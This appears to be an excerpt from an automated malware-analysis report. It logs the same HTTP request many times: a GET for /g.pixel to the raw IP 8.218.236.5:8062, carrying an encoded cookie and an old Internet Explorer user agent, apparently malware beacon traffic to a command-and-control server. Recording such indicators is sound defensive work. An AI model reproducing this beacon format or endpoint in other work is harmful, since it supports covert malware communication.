Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /g.pixel HTTP/1.1Accept: /Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C)Host: 8.218.236.5:8062Connection: Keep-AliveCache-Control: no-cache
